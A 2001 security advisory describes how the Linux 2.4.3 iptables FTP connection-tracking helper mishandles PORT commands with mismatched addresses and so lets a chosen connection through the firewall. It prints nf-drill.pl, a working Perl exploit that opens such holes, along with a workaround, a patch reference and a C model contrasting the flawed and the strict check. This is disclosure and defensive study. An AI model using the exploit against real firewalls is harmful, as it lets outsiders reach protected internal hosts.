iptables FTP stateful inspection allows arbitrary entries to be inserted into the connection table

Published: 2001-04-21
Updated: 2001-04-21
Severity: High
Threat type: Spoofing
Error type: Design error
Exploitation: Server mode

Affected systems

Linux kernel 2.4.3

Detailed description

The Linux kernel contains a built-in firewall implementation called iptables. iptables supports stateful inspection of several application protocols, FTP among them. The stateful inspection module (the FTP connection-tracking helper, ip_conntrack_ftp) exists so that the secondary data connections of an FTP client or server located behind the firewall can pass without static rules for every possible port.

The problem arises when an FTP PORT command carries an IP address that differs from the address of the client whose control connection the stateful inspection module is tracking. Although the module detects this condition, it handles it incorrectly: an entry for the connection named in the PORT command is nevertheless inserted into the RELATED connection table. For a short time (the exploit below notes about 10 seconds) this permits a connection from the FTP server to the address and port given in the PORT command to pass through the firewall, even though no rule allows that traffic.

An attacker who can send a PORT command across the firewall, and who controls or colludes with the FTP server, can use this to reach hosts behind the firewall that the rule set does not authorize the server to contact.

Test code

#!/usr/bin/perl
#
# nf-drill.pl --- "Drill" holes open in Linux iptables connection table
# Author: Cristiano Lincoln Mattos <lincoln@cesar.org.br>, 2001
#
# Advisory: http://www.tempest.com.br/advisories/linux-iptables
#
# Tempest Security Technologies - a business unit of:
# CESAR - Centro de Estudos e Sistemas Avancados do Recife
#
# This code is licensed under the GPL.
#

use Socket;
use Getopt::Long;
use strict;

# Option variables
my $server;
my $serverport = 21;
my $host;
my $port;
my $verbose = 0;

# Print function: level 0 is always printed, level 1 only in verbose mode
sub out {
    my ($level,$text) = @_;
    if (!$level || ($level && $verbose)) {
        print "$text";
    }
}

my $opt = GetOptions("server=s" => \$server, "serverport=s" => \$serverport,
                     "host=s" => \$host, "port=i" => \$port,
                     "verbose" => \$verbose);

if ($server eq "" || $host eq "" || $port eq "" || $port < 0 || $port > 65535) {
    print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]\n";
    print "   - server: specifies the FTP server (IP or hostname) to connect to\n";
    print "   - serverport: specifies the port of the FTP server -- default: 21\n";
    print "   - host: the IP of the target to open in the connection table\n";
    print "   - port: the port of the target to open in the connection table\n";
    print "   - verbose: sets verbose mode\n";
    exit(0);
}

print "\n nf-blast.pl -- Cristiano Lincoln Mattos <lincoln\@cesar.org.br>, 2001\n";
print " Tempest Security Technologies\n\n";

# For the meanwhile, expecting an IP.
# Build "PORT h1,h2,h3,h4,p1,p2" naming the *target* host, not this client,
# which is the address mismatch the conntrack helper mishandles.
my @ip = split(/\./,$host);
my $str = "PORT " . $ip[0] . "," . $ip[1] . "," . $ip[2] . "," . $ip[3] . "," .
          ($port >> 8) . "," . ($port % 256) . "\r\n";

# Socket init (protocol 6 = TCP)
my $ipn = inet_aton($server);
if (!$ipn) {
    out(0," Error: could not convert $server\n");
    exit(0);
}
my $sin = sockaddr_in($serverport,$ipn);
socket(Sock,PF_INET,SOCK_STREAM,6);
if (!connect(Sock,$sin)) {
    out(0," Error: could not connect to $server:$serverport.\n");
    exit(0);
}
out(0," - Connected to $server:$serverport\n");

# Read the server banner
my $buf;
recv(Sock,$buf,120,0);
chomp($buf);
out(1," - RECV: $buf\n");

# First send a dummy one, just to establish the connection in the iptables logic
send(Sock,$str,0);
out(1," - SEND: $str");
recv(Sock,$buf,120,0);
chomp($buf);
out(1," - RECV: $buf\n");

# Now, send the one that will insert itself into the connection table
send(Sock,$str,0);
out(1," - SEND: $str");
recv(Sock,$buf,120,0);
chomp($buf);
out(1," - RECV: $buf\n");

out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n");
out(0," - Closing connection to $server:$serverport.\n\n");
close(Sock);

Solution

Workaround: disable the FTP stateful inspection module (do not load ip_conntrack_ftp) until a fixed kernel is installed; FTP data connections will then have to be permitted explicitly or will not pass.

Red Hat has issued an advisory. By default Red Hat Linux is configured to use ipchains rather than iptables, so default installations are not exposed; Red Hat will shortly release an updated kernel that fixes this problem.

The NetFilter core team has released a patch:

Linux kernel 2.4.3:
Linux NetFilter Developers patch ftp-security.patch
http://netfilter.samba.org/security-fix/ftp-security.patch
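The decision the helper gets wrong is easiest to see side by side with the check it should make. The following is an added illustration, not netfilter source and not the referenced ftp-security.patch: it builds a PORT command the way nf-drill.pl does, parses it the way a connection-tracking helper must, and then models the flawed decision (mismatch noticed, expectation created anyway) next to the strict one (no expectation unless the PORT address is the client's own). All function names, the endpoint_t type and the 10.0.0.x addresses are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Endpoint carried in a PORT command (host byte order). Hypothetical type. */
typedef struct {
    uint32_t ip;
    uint16_t port;
} endpoint_t;

/* Build "PORT h1,h2,h3,h4,p1,p2\r\n" exactly as nf-drill.pl does
 * (the four address octets, then port >> 8 and port % 256).
 * Returns the number of bytes written, or -1 if buf is too small. */
int format_port_cmd(uint32_t ip, uint16_t port, char *buf, size_t n) {
    int len = snprintf(buf, n, "PORT %u,%u,%u,%u,%u,%u\r\n",
                       (ip >> 24) & 0xffu, (ip >> 16) & 0xffu,
                       (ip >> 8) & 0xffu, ip & 0xffu,
                       (unsigned)(port >> 8), (unsigned)(port & 0xff));
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}

/* Parse a PORT command into an endpoint. Returns 1 on success, 0 if the
 * line is not a well-formed PORT command (wrong verb, non-numeric field,
 * field > 255, wrong field count, trailing garbage). */
int parse_port_cmd(const char *line, endpoint_t *out) {
    unsigned v[6];
    const char *p;
    int i;

    if (strncmp(line, "PORT ", 5) != 0)
        return 0;
    p = line + 5;
    for (i = 0; i < 6; i++) {
        char *end;
        unsigned long n;
        if (*p < '0' || *p > '9')       /* strtoul alone would accept ' ' or '-' */
            return 0;
        n = strtoul(p, &end, 10);
        if (n > 255)
            return 0;
        v[i] = (unsigned)n;
        p = end;
        if (i < 5) {
            if (*p != ',')
                return 0;
            p++;
        }
    }
    if (*p != '\r' && *p != '\n' && *p != '\0')
        return 0;
    out->ip = ((uint32_t)v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    out->port = (uint16_t)((v[4] << 8) | v[5]);
    return 1;
}

/* The helper's decision for a PORT command seen on a control connection
 * whose client address is client_ip. Returns 1 when a RELATED expectation
 * "server -> target" is created (a temporary hole for that flow) and fills
 * *expect with the target; *mismatches counts detected address mismatches.
 *
 * flawed != 0 models the behaviour described in the advisory: the mismatch
 * is detected (counted here, logged in the real module) but the expectation
 * is created anyway.  flawed == 0 is the strict check: refuse the
 * expectation unless the PORT address is the client's own. */
int helper_decides(const char *line, uint32_t client_ip, int flawed,
                   endpoint_t *expect, int *mismatches) {
    endpoint_t ep;
    if (!parse_port_cmd(line, &ep))
        return 0;
    if (ep.ip != client_ip) {
        if (mismatches)
            (*mismatches)++;             /* "detected" */
        if (!flawed)
            return 0;                    /* strict helper refuses */
    }
    *expect = ep;
    return 1;
}

int main(void) {
    /* Constructed scenario: client 10.0.0.5 behind the firewall names
     * internal host 10.0.0.20 port 22 in its PORT command. */
    uint32_t client = 0x0A000005u;
    char cmd[64];
    endpoint_t hole;
    int mism = 0;

    format_port_cmd(0x0A000014u, 22, cmd, sizeof cmd);
    printf("client sends: %s", cmd);

    if (helper_decides(cmd, client, 1, &hole, &mism))
        printf("flawed helper: expectation created, server may reach %u.%u.%u.%u:%u\n",
               hole.ip >> 24, (hole.ip >> 16) & 0xffu, (hole.ip >> 8) & 0xffu,
               hole.ip & 0xffu, hole.port);
    if (!helper_decides(cmd, client, 0, &hole, &mism))
        printf("strict helper: PORT address != client address, no expectation\n");
    return 0;
}
```

Only the decision in helper_decides differs between the two models; parsing is identical. That is the point for anyone reviewing a protocol helper: a recognised anomaly that is merely logged and then allowed to fall through to the normal path is, for the firewall, the same as not checking at all.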